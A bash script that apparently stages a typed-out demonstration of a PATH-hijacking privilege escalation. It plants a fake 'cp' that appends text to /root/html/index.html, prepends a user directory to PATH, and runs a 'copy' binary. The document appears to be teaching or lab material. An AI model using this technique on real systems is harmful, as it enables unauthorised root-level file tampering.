#!/bin/bash

echo -n "vulnerable:2> "
sleep 1
echo "echo -e '#!/bin/bash\\n\\necho \"test ;)\" >> /root/html/index.html' > cp" | pv -qL 10 
bash -c "echo -e '#!/bin/bash\\n\\necho \"test ;)\" >> /root/html/index.html' > cp"
echo -n "vulnerable:2> "
sleep 1
echo "chmod +x cp" | pv -qL 10 
bash -c "chmod +x cp"
echo -n "vulnerable:2> "
sleep 1
echo "export PATH=\"/home/dev_user:\$PATH\"" | pv -qL 10 
bash -c "export PATH=\"/home/dev_user:\$PATH\""
echo -n "vulnerable:2> "
sleep 1
echo "copy" | pv -qL 10 
bash -c "copy"
exit
